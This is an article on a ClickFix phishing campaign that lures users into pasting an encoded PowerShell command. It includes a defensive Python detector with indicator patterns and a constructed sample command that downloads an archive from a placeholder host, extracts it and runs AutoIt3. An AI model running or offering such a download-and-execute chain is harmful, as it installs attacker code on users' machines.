Clickfix Hits OneDrive: Identifying Manipulation

Cybersecurity researchers from Trellix warn about a new phishing campaign designed to deploy a malicious PowerShell script.

Rafael Pena, a security researcher at Trellix, revealed that this campaign uses social engineering to trick users into executing the PowerShell script themselves, which can ultimately compromise their systems.

Trellix has named this phishing campaign OneDrive Pastejacking. The attack begins with an email carrying an HTML attachment that, when opened, displays an image resembling a OneDrive page with an error message stating: “It was not possible to connect to the OneDrive cloud service. To fix the error, you must manually update the DNS cache.”

The message offers two buttons: “How to fix” and “Details”. Clicking “Details” redirects the user to a legitimate Microsoft Learn page on troubleshooting DNS issues. Clicking “How to fix”, however, walks the user through a series of steps: opening a PowerShell terminal and executing a Base64-encoded command that supposedly resolves the error.

The decoded command performs actions such as running “ipconfig /flushdns”, creating a folder named “downloads” on the C: drive, downloading and extracting files into it, and executing a script with “AutoIt3.exe”.
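For defenders, the useful signal is that every step of this chain is visible in process command-line telemetry once the Base64 is decoded. The following detection sketch is an added example, not Trellix's code or part of the original article: it decodes a PowerShell `-EncodedCommand` argument (Base64 of UTF-16LE) and scores the result against the indicators the article lists. The command lines, the `example.invalid` host and the archive and script file names are constructed for the demo, not indicators from the campaign.

```python
import base64
import re
from typing import List, Optional

# Indicators drawn from the campaign description: flush the DNS cache, create a
# "downloads" folder on C:, download and extract files, run a script with AutoIt3.exe.
INDICATORS = {
    "flushdns": re.compile(r"ipconfig\s+/flushdns", re.I),
    "downloads_dir": re.compile(r"(new-item|mkdir|md)\b[^;]*\\downloads", re.I),
    "download": re.compile(r"(invoke-webrequest|iwr|downloadfile|curl)\b", re.I),
    "extract": re.compile(r"expand-archive|extracttodirectory", re.I),
    "autoit": re.compile(r"autoit3\.exe", re.I),
}
# PowerShell accepts unambiguous prefixes of -EncodedCommand; cover the common ones.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_command(cmdline: str) -> List[str]:
    """Names of campaign indicators found in the command line (decoded if encoded)."""
    script = decode_encoded_command(cmdline) or cmdline
    return [name for name, rx in INDICATORS.items() if rx.search(script)]

def is_clickfix_chain(cmdline: str) -> bool:
    """Flag when AutoIt3 is launched or at least three steps of the chain co-occur."""
    hits = score_command(cmdline)
    return "autoit" in hits or len(hits) >= 3

# Constructed sample mirroring the described chain (placeholder host, not a real IoC).
_SCRIPT = (r"ipconfig /flushdns; New-Item -ItemType Directory -Path C:\downloads -Force; "
           r"Invoke-WebRequest -Uri http://example.invalid/p.zip -OutFile C:\downloads\p.zip; "
           r"Expand-Archive C:\downloads\p.zip C:\downloads; "
           r"Start-Process C:\downloads\AutoIt3.exe C:\downloads\s.a3x")
SAMPLE_ENCODED = ("powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
                  + base64.b64encode(_SCRIPT.encode("utf-16-le")).decode())
# A lone DNS flush, as a help-desk article might actually recommend, should not fire.
SAMPLE_BENIGN = 'powershell.exe -NoProfile -Command "ipconfig /flushdns"'

if __name__ == "__main__":
    for line in (SAMPLE_ENCODED, SAMPLE_BENIGN):
        print(is_clickfix_chain(line), score_command(line))
```

The same scoring can be run over Sysmon Event ID 1 or EDR process-creation records; requiring several steps together keeps a legitimate `ipconfig /flushdns` from raising an alert on its own.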

This campaign targets users in the USA, South Korea, Germany, India, Ireland, Italy, Norway, and Great Britain. Similar attacks are also being tracked by ReliaQuest, Proofpoint, and McAfee Labs, indicating the growing popularity of this phishing method, known as ClickFix.

This case underscores the importance of critical thinking, as cybercriminals continue to refine their tactics by exploiting people’s trust in reputable brands and their eagerness to quickly resolve technical issues.

Ensuring security involves not only using antivirus programs but also developing the ability to recognize suspicious activities, particularly when it involves executing unfamiliar commands on your device. Engaging in unnecessary technical commands often results
